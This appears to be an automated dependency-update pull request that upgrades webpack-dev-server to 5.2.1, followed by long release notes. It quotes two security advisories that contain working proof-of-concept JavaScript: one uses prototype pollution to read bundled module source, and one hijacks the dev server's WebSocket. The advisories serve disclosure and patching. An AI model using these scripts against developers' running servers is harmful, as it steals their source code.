Update dependency webpack-dev-server to v5 [SECURITY]

[renovate[bot]]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
webpack-dev-server	3.11.3 -> 5.2.1

GitHub Vulnerability Alerts

CVE-2025-30359

Summary

Source code may be stolen when you access a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables. By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

PoC

1. Download reproduction.zip and extract it
2. Run npm i
3. Run npx webpack-dev-server
4. Open https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
5. You can see the source code output in the document and the devtools console.

The script in the POC site is:

let moduleList
const onHandlerSet = (handler) => {
  console.log('h', handler)
  moduleList = handler.require.m
}

const originalArrayForEach = Array.prototype.forEach
Array.prototype.forEach = function forEach(callback, thisArg) {
  callback((handler) => {
    onHandlerSet(handler)
  })
  originalArrayForEach.call(this, callback, thisArg)
  Array.prototype.forEach = originalArrayForEach
}

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
  console.log(moduleList)
  for (const key in moduleList) {
    const p = document.createElement('p')
    const title = document.createElement('strong')
    title.textContent = key
    const code = document.createElement('code')
    code.textContent = moduleList[key].toString()
    p.append(title, ':', document.createElement('br'), code)
    document.body.appendChild(p)
  }
})
document.head.appendChild(script)

This script uses the function generated by renderRequire.

    // The require function
    function __webpack_require__(moduleId) {
        // Check if module is in cache
        var cachedModule = __webpack_module_cache__[moduleId];
        if (cachedModule !== undefined) {
            return cachedModule.exports;
        }
        // Create a new module (and put it into the cache)
        var module = __webpack_module_cache__[moduleId] = {
            // no module.id needed
            // no module.loaded needed
            exports: {}
        };
        // Execute the module function
        var execOptions = {
            id: moduleId,
            module: module,
            factory: __webpack_modules__[moduleId],
            require: __webpack_require__
        };
        __webpack_require__.i.forEach(function(handler) {
            handler(execOptions);
        });
        module = execOptions.module;
        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);
        // Return the exports of the module
        return module.exports;
    }

Especially, it uses the fact that Array::forEach is called for __webpack_require__.i and execOptions contains __webpack_require__. It uses prototype pollution against Array::forEach to extract __webpack_require__ reference.

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.

Old content

Summary

Source code may be stolen when you use output.iife: false and access a malicious web site.

Details

When output.iife: false is set, some global variables for the webpack runtime are declared on the window object (e.g. __webpack_modules__). Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the window object. By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

I pointed out output.iife: false, but if there are other options that makes the webpack runtime variables to be declared on the window object, the same will apply for those cases.

PoC

1. Download reproduction.zip and extract it
2. Run npm i
3. Run npx webpack-dev-server
4. Open https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/
5. Open the devtools console.
6. You can see the content of src/index.js and other scripts loaded.

The script in the POC site is:

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
    for (const module in window.__webpack_modules__) {
        console.log(`${module}:`, window.__webpack_modules__[module].toString())
    }
})
document.head.appendChild(script)

Impact

This vulnerability can result in the source code to be stolen for users that has output.iife: false option set and uses a predictable port and output path for the entrypoint script.

CVE-2025-30360

Summary

Source code may be stolen when you access a malicious web site with non-Chromium based browser.

Details

The Origin header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732. But webpack-dev-server always allows IP address Origin headers. https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127 This allows websites that are served on IP addresses to connect WebSocket. By using the same method described in the article linked from CVE-2018-14732, the attacker get the source code.

related commit: https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb (note that checkHost function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.

This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to the non-HTTPS private access blocking feature.

PoC

1. Download reproduction.zip and extract it
2. Run npm i
3. Run npx webpack-dev-server
4. Open http://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
5. Edit src/index.js in the extracted directory
6. You can see the content of src/index.js

The script in the POC site is:

window.webpackHotUpdate = (...args) => {
    console.log(...args);
    for (i in args[1]) {
        document.body.innerText = args[1][i].toString() + document.body.innerText
	    console.log(args[1][i])
    }
}

let params = new URLSearchParams(window.location.search);
let target = new URL(params.get('target') || 'http://127.0.0.1:8080');
let file = params.get('file')
let wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';
let wsPort = target.port;
var currentHash = '';
var currentHash2 = '';
let wsTarget = `${wsProtocol}://${target.hostname}:${wsPort}/ws`;
ws = new WebSocket(wsTarget);
ws.onmessage = event => {
    console.log(event.data);
    if (event.data.match('"type":"ok"')) {
        s = document.createElement('script');
        s.src = `${target}${file}.${currentHash2}.hot-update.js`;
        document.body.appendChild(s)
    }
    r = event.data.match(/"([0-9a-f]{20})"/);
    if (r !== null) {
        currentHash2 = currentHash;
        currentHash = r[1];
        console.log(currentHash, currentHash2);
    }
}

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.

---

Release Notes

webpack/webpack-dev-server (webpack-dev-server)

v5.2.1

Compare Source

Security

• cross-origin requests are not allowed unless allowed by Access-Control-Allow-Origin header
• requests with an IP addresses in the Origin header are not allowed to connect to WebSocket server unless configured by allowedHosts or it different from the Host header

The above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.

Bug Fixes

• prevent overlay for errors caught by React error boundaries (#​5431) (8c1abc9)
• take the first network found instead of the last one, this restores the same behavior as 5.0.4 (#​5411) (ffd0b86)

v5.2.0

Compare Source

Features

• added getClientEntry and getClientHotEntry methods to get clients entries (dc642a8)

Bug Fixes

• speed up initial client bundling (145b5d0)

v5.1.0

Compare Source

Features

• add visual progress indicators (a8f40b7)
• added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
• allow the server option to be Function (#​5275) (02a1c6d)
• http2 support for connect and connect compatibility frameworks which support HTTP2 (#​5267) (6509a3f)

Bug Fixes

• check the platform property to determinate the target (#​5269) (c3b532c)
• ipv6 output (#​5270) (06005e7)
• replace rimraf with rm (#​5162) (1a1561f)
• replace default gateway (#​5255) (f5f0902)
• support devServer: false (#​5272) (8b341cb)

5.0.4 (2024-03-19)

Bug Fixes

• security: bump webpack-dev-middleware (#​5112) (aab576a)

5.0.3 (2024-03-12)

Bug Fixes

• types: proxy (#​5101) (6e1aed3)

5.0.2 (2024-02-16)

Bug Fixes

• types (#​5057) (da2c24d)

5.0.1 (2024-02-13)

Bug Fixes

• avoid using eval in client (#​5045) (7681477)
• overlay and require-trusted-types-for (#​5046) (e115436)

v5.0.4

Compare Source

v5.0.3

Compare Source

v5.0.2

Compare Source

v5.0.1

Compare Source

v5.0.0

Compare Source

Migration Guide and Changes.

4.15.1 (2023-06-09)

Bug Fixes

• replace :: with localhost before openBrowser() (#​4856) (874c44b)
• types: compatibility with @types/ws (#​4899) (34bcec2)

v4.15.2

Compare Source

4.15.2 (2024-03-20)

Bug Fixes

• security: bump webpack-dev-middleware (4116209)

v4.15.1

Compare Source

v4.15.0

Compare Source

Features

• overlay displays unhandled promise rejection (#​4849) (d1dd430)

v4.14.0

Compare Source

Features

• allow CLI to be ESM (#​4837) (bb4a5d9)
• allow filter overlay errors/warnings with function (#​4813) (aab01b3)

4.13.3 (2023-04-15)

Bug Fixes

• perf: reduced initial start time (#​4818) (fcf01d1)

4.13.2 (2023-03-31)

Bug Fixes

• prevent open 0.0.0.0 in browser due windows problems (04e74f2)

4.13.1 (2023-03-18)

Bug Fixes

• make webpack optional peer dependency (#​4778) (71be54e)

v4.13.3

Compare Source

v4.13.2

Compare Source

v4.13.1

Compare Source

v4.13.0

Compare Source

Features

• added client.overlay.runtimeErrors option to control runtime errors (#​4773) (dca2366)

v4.12.0

Compare Source

Features

• allow to set the sockjs_url option (only sockjs) using the webSocketServer.options.sockjsUrl option (#​4586) (69a2fba)
• catch runtime error (#​4605) (87a26cf)
• improve styles for overlay (#​4576) (791fb85)
• open editor when clicking error on overlay (#​4587) (efb2cec)

Bug Fixes

• compatibility with experiments.buildHttp (#​4585) (5b846cb)
• respect NODE_PATH env variable (#​4581) (b857e6f)

4.11.1 (2022-09-19)

Bug Fixes

• respect client.logging option for all logs (#​4572) (375835c)

v4.11.1

Compare Source

v4.11.0

Compare Source

Features

• make allowedHosts accept localhost subdomains by default (#​4357) (0a33e6a)

Bug Fixes

• auto reply to OPTIONS requests only when unhandled (#​4559) (984af02), closes #​4551

4.10.1 (2022-08-29)

Bug Fixes

• compatibility with old browsers (#​4544) (6a430d4)

v4.10.1

Compare Source

v4.10.0

Compare Source

Features

• allow to configure more client options via resource URL (#​4274) (216e3cb)

Bug Fixes

• response correctly when receive an OPTIONS request (#​4185) (2b3b7e0)

4.9.3 (2022-06-29)

Bug Fixes

• avoid creation unnecessary stream for static sockjs file (#​4482) (049b153)
• history-api-fallback now supports HEAD requests and handles them the same as GET (8936082)

4.9.2 (2022-06-06)

Bug Fixes

• add @types/serve-static to dependencies (#​4468) (af83deb)

4.9.1 (2022-05-31)

Bug Fixes

• security problem with sockjs (#​4465) (e765182)

v4.9.3

Compare Source

v4.9.2

Compare Source

v4.9.1

Compare Source

v4.9.0

Compare Source

Features

• support Trusted Types for client overlay (#​4404) (8132e1d)

Bug Fixes

• ie11 runtime (#​4403) (256d5fb)
• replace portfinder with custom implementation and fix security problem (#​4384) (eea50f3)
• use the host in options to check if port is available (#​4385) (a10c7cf)

4.8.1 (2022-04-06)

Bug Fixes

• types (#​4373) (f6fe6be)

v4.8.1

Compare Source

v4.8.0

Compare Source

Features

• export initialized socket client (#​4304) (7920364)

Bug Fixes

• update description for --no-client-reconnect (#​4248) (317648d)
• update description for --no-client (#​4250) (c3b6690)
• update description for --no-history-api-fallback (#​4277) (d63a0a2)
• update negated descriptions for more options (#​4287) (c64bd94)
• update schema to have negatedDescription only for type boolean (#​4280) (fcf8e8e)

4.7.4 (2022-02-02)

Bug Fixes

• add @​types/express (#​4226) (e55f728)
• negative descriptions (#​4216) (fd854c0)
• types for the proxy option (#​4173) (efec2f5)
• use CLI specific description for --open-app-name and --web-socket-server (#​4215) (329679a)

4.7.3 (2022-01-11)

Security

• update selfsigned to 2.0.0 version

4.7.2 (2021-12-29)

Bug Fixes

• apply onAfterSetupMiddleware after setupMiddlewares (as behavior earlier) (f6bc644)

4.7.1 (2021-12-22)

Bug Fixes

• removed url package, fixed compatibility with future webpack defaults (#​4132) (4e5d8ea)

v4.7.4

Compare Source

v4.7.3

Compare Source

v4.7.2

Compare Source

v4.7.1

Compare Source

v4.7.0

Compare Source

Features

• added the setupMiddlewares option and deprecated onAfterSetupMiddleware and onBeforeSetupMiddleware options (#​4068) (c13aa56)
• added types (8f02c3f)
• show deprecation warning for cacert option (#​4115) (c73ddfb)

Bug Fixes

• add description for watchFiles options (#​4057) (75f3817)
• allow passing options for custom server (#​4110) (fc8bed9)
• correct schema for ClientLogging (#​4084) (9b7ae7b)
• mark --open-app deprecated in favor of --open-app-name (#​4091) (693c28a)
• show deprecation warning for both https and http2 (#​4069) (d8d5d71)
• update --web-socket-server description (#​4098) (65955e9)
• update listen and close deprecation warning message (#​4097) (b217a19)
• update descriptions of https and server options (#​4094) (f97c9e2)

v4.6.0

Compare Source

Features

• allow to pass all chokidar options (#​4025) (5026601)

Bug Fixes

• reconnection logic (#​4044) (9b32c96)
• reload on warnings (#​4056) (1ba9720)

v4.5.0

Compare Source

Features

• add --web-socket-server-type option for CLI (#​4001) (17c390a)
• show deprecation warning for https/http2 option, migration guide for https and migration guide for http2 (because we use spdy for http2 due express doesn't support http2) (#​4003) (521cf85)

Bug Fixes

• infinity refresh on warnings (#​4006) (10da223)
• invalid host message is missing on client with https (#​3997) (#​3998) (ff0869c)
• remove process listeners after stopping the server (#​4013) (d198e4e)

v4.4.0

Compare Source

Features

• added the server option, now you can pass server options, example { server: { type: 'http', options: { maxHeaderSize: 32768 } } }, available options for http and https, note - for http2 is used spdy, options specified in the server.options option take precedence over https/http2 options (#​3940) (a70a7ef)
• added the client.reconnect option (#​3912) (5edad76)
• improve error handling within startCallback and endCallback (#​3969) (b0928ac)

Bug Fixes

• schema for web socket server type (#​3913) (f6aa6f7)
• typo in SSL information log (#​3939) (4c6103b)

4.3.1 (2021-10-04)

Bug Fixes

• perf (#​3906) (f6e2a19)

v4.3.1

Compare Source

v4.3.0

Compare Source

Features

• allow array for headers option (#​3847) (9911437)
• gracefully and force shutdown (#​3880) (db24b16)

Bug Fixes

• avoid web socket connection when web socket server is not running (#​3879) (8874d72)
• display file name for warnings/errors in overlay (#​3867) (d20def5)
• formatting errors/warnings (#​3877) (f0dbea0)
• handle 0 value of the port option property (ed67f66)

4.2.1 (2021-09-13)

Bug Fixes

• infinity loop for multi compiler mode (#​3840) (e019bd2)
• reloading logic for multi compiler mode (#​3841) (ef148ec)

4.2.0 (2021-09-09)

Features

• added the http.ca option (CLI option added too) (should be used instead cacert, because we will remove it in the next major release in favor the https.ca option)
• added the https.crl option (CLI options added too), more information
• https.ca/https.cacert/ https.cert/https.crl/https.key/https.pfx options are now accept Arrays of Buffer/string/Path to file, using --https-*-reset CLI options you can reset these options
• https.pfx/https.key can be Object[], more information
• https options can now accept custom options, you can use:

module.exports = {
  // Other options
  devServer: {
    https: {
      // Allow to set additional TSL options https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options
      minVersion: "TLSv1.1",
      ca: path.join(httpsCertificateDirectory, "ca.pem"),
      pfx: path.join(httpsCertificateDirectory, "server.pfx"),
      key: path.join(httpsCertificateDirectory, "server.key"),
      cert: path.join(httpsCertificateDirectory, "server.crt"),
      passphrase: "webpack-dev-server",
    },
  }
};

Bug Fixes

• accept connections with file: and chrome-extensions: protocol by default (#​3822) (138f064)
• close overlay on disconnection (#​3825) (011bcf1)
• respect https.cacert option (#​3820) (0002ebf)

4.1.1 (2021-09-07)

Bug Fixes

• improve the description of the magicHtml option (#​3772) (b80610f)
• replace ansi-html with ansi-html-community to avoid CVE (#​3801) (36fd214)

v4.2.1

Compare Source

v4.2.0

Compare Source

v4.1.1

Compare Source

v4.1.0

Compare Source

Features

• added the magicHtml option (#​3717) (4831f58)
• allow to set hot and live-reload for client using search params (1c57680)
• show warning when the hot option is enabled with the HMR plugin in config (#​3744) (6cb1e4e)

Bug Fixes

• change log type of Disconnected! to info (fde27f5)
• handle --allowed-hosts all correctly (#​3720) (326ed56)
• output documentation link on errors (#​3680) (e16221b)
• respect the bypass option with target/router options for proxy (b5dd568)

v4.0.0

Compare Source

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• [ ] If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.